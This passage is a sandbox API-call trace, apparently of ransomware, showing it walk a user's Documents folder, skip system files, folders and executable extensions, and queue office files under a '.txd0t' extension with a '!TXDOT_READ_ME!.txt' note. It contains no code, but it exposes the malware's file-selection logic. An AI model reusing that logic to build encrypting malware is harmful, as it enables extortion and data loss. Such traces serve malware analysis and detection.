lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.644] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.644] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" [0074.644] SetEvent (hEvent=0x3fc) returned 1 [0074.644] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0xace66270, ftLastWriteTime.dwHighDateTime=0x1d5ef41, nFileSizeHigh=0x0, nFileSizeLow=0xad0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp", cAlternateFileName="WUUIQI~1.ODP")) returned 1 [0074.644] StrCmpW (psz1="wUuIQI1na.odp", psz2=".") returned 1 [0074.644] StrCmpW (psz1="wUuIQI1na.odp", psz2="..") returned 1 [0074.644] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0074.644] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0074.644] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="wUuIQI1na.odp", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" [0074.644] PathFindExtensionW (pszPath="wUuIQI1na.odp") returned=".odp" [0074.644] StrCmpW (psz1=".odp", psz2=".txd0t") returned -1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="bootsect.bak") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="iconcache.db") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="thumbs.db") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2=" ransomware ") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2=" ransom ") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="debug.txt") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="boot.ini") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="desktop.ini") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="autorun.inf") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="ntuser.dat") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="ntldr") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="ntdetect.com") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="bootfont.bin") returned 1 [0074.644] StrCmpIW (psz1="wUuIQI1na.odp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.644] PathFindExtensionW (pszPath="wUuIQI1na.odp") returned=".odp" [0074.644] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odp") returned 0x0 [0074.644] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.644] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.645] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.651] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.651] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" [0074.651] SetEvent (hEvent=0x3fc) returned 1 [0074.651] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0xace66270, ftLastWriteTime.dwHighDateTime=0x1d5ef41, nFileSizeHigh=0x0, nFileSizeLow=0xad0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp", cAlternateFileName="WUUIQI~1.ODP")) returned 0 [0074.651] FindClose (in: hFindFile=0xec2470 | out: hFindFile=0xec2470) returned 1 [0074.651] GetProcessHeap () returned 0xe30000 [0074.651] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed46d0 | out: hHeap=0xe30000) returned 1 [0074.652] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebf37130, ftCreationTime.dwHighDateTime=0x1d5ed0f, ftLastAccessTime.dwLowDateTime=0xc2d85810, ftLastAccessTime.dwHighDateTime=0x1d5e6f2, ftLastWriteTime.dwLowDateTime=0xc2d85810, ftLastWriteTime.dwHighDateTime=0x1d5e6f2, nFileSizeHigh=0x0, nFileSizeLow=0x10c7a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="xuaWupFvOSfqE.pps", cAlternateFileName="XUAWUP~1.PPS")) returned 1 [0074.652] StrCmpW (psz1="xuaWupFvOSfqE.pps", psz2=".") returned 1 [0074.652] StrCmpW (psz1="xuaWupFvOSfqE.pps", psz2="..") returned 1 [0074.652] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.652] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0074.652] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="xuaWupFvOSfqE.pps", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" [0074.652] PathFindExtensionW (pszPath="xuaWupFvOSfqE.pps") returned=".pps" [0074.652] StrCmpW (psz1=".pps", psz2=".txd0t") returned -1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="bootsect.bak") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="iconcache.db") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="thumbs.db") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2=" ransomware ") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2=" ransom ") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="debug.txt") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="boot.ini") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="desktop.ini") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="autorun.inf") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="ntuser.dat") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="ntldr") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="ntdetect.com") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="bootfont.bin") returned 1 [0074.652] StrCmpIW (psz1="xuaWupFvOSfqE.pps", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.652] PathFindExtensionW (pszPath="xuaWupFvOSfqE.pps") returned=".pps" [0074.652] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pps") returned 0x0 [0074.652] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.652] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.652] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.660] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.660] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" [0074.660] SetEvent (hEvent=0x3fc) returned 1 [0074.660] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x2bd48c40, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0x2bd48c40, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 1 [0074.660] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2=".") returned 1 [0074.661] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2="..") returned 1 [0074.661] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.661] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0074.661] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="_L78DH7wK y2TBjiEU", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system32\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\local\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\boot\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\perflogs\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\programdata\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\drivers\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\wsus\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="crypt_detect") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="cryptolocker") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="ransomware") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\WINDOWS") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files") returned 0x0 [0074.661] GetProcessHeap () returned 0xe30000 [0074.661] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f4) returned 0xed46d0 [0074.661] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.661] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\*", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*" [0074.661] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x2bd48c40, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0x2bd48c40, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0074.662] StrCmpW (psz1=".", psz2=".") returned 0 [0074.662] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x2bd48c40, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0x2bd48c40, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.662] StrCmpW (psz1="..", psz2=".") returned 1 [0074.662] StrCmpW (psz1="..", psz2="..") returned 0 [0074.662] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcb4b0, ftCreationTime.dwHighDateTime=0x1d5eeb8, ftLastAccessTime.dwLowDateTime=0x6f5cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ecf7, ftLastWriteTime.dwLowDateTime=0x6f5cfd20, ftLastWriteTime.dwHighDateTime=0x1d5ecf7, nFileSizeHigh=0x0, nFileSizeLow=0x1db3, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CNnaWo_J.xls", cAlternateFileName="")) returned 1 [0074.662] StrCmpW (psz1="CNnaWo_J.xls", psz2=".") returned 1 [0074.662] StrCmpW (psz1="CNnaWo_J.xls", psz2="..") returned 1 [0074.662] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.662] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.662] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="CNnaWo_J.xls", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" [0074.662] PathFindExtensionW (pszPath="CNnaWo_J.xls") returned=".xls" [0074.662] StrCmpW (psz1=".xls", psz2=".txd0t") returned 1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="bootsect.bak") returned 1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="iconcache.db") returned -1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="thumbs.db") returned -1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2=" ransomware ") returned 1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2=" ransom ") returned 1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="debug.txt") returned -1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="boot.ini") returned 1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="desktop.ini") returned -1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="autorun.inf") returned 1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="ntuser.dat") returned -1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="ntldr") returned -1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="ntdetect.com") returned -1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="bootfont.bin") returned 1 [0074.662] StrCmpIW (psz1="CNnaWo_J.xls", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.662] PathFindExtensionW (pszPath="CNnaWo_J.xls") returned=".xls" [0074.662] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xls") returned 0x0 [0074.663] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.663] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.663] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.673] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.673] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" [0074.673] SetEvent (hEvent=0x3fc) returned 1 [0074.673] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3bd1d60, ftCreationTime.dwHighDateTime=0x1d5e397, ftLastAccessTime.dwLowDateTime=0xc80579a0, ftLastAccessTime.dwHighDateTime=0x1d5ed7b, ftLastWriteTime.dwLowDateTime=0xc80579a0, ftLastWriteTime.dwHighDateTime=0x1d5ed7b, nFileSizeHigh=0x0, nFileSizeLow=0x58e8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="EPWE.xlsx", cAlternateFileName="EPWE~1.XLS")) returned 1 [0074.673] StrCmpW (psz1="EPWE.xlsx", psz2=".") returned 1 [0074.673] StrCmpW (psz1="EPWE.xlsx", psz2="..") returned 1 [0074.673] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.673] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.673] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="EPWE.xlsx", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" [0074.673] PathFindExtensionW (pszPath="EPWE.xlsx") returned=".xlsx" [0074.673] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="bootsect.bak") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="iconcache.db") returned -1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="thumbs.db") returned -1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2=" ransomware ") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2=" ransom ") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="debug.txt") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="boot.ini") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="desktop.ini") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="autorun.inf") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="ntuser.dat") returned -1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="ntldr") returned -1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="ntdetect.com") returned -1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="bootfont.bin") returned 1 [0074.673] StrCmpIW (psz1="EPWE.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.673] PathFindExtensionW (pszPath="EPWE.xlsx") returned=".xlsx" [0074.673] StrStrIW 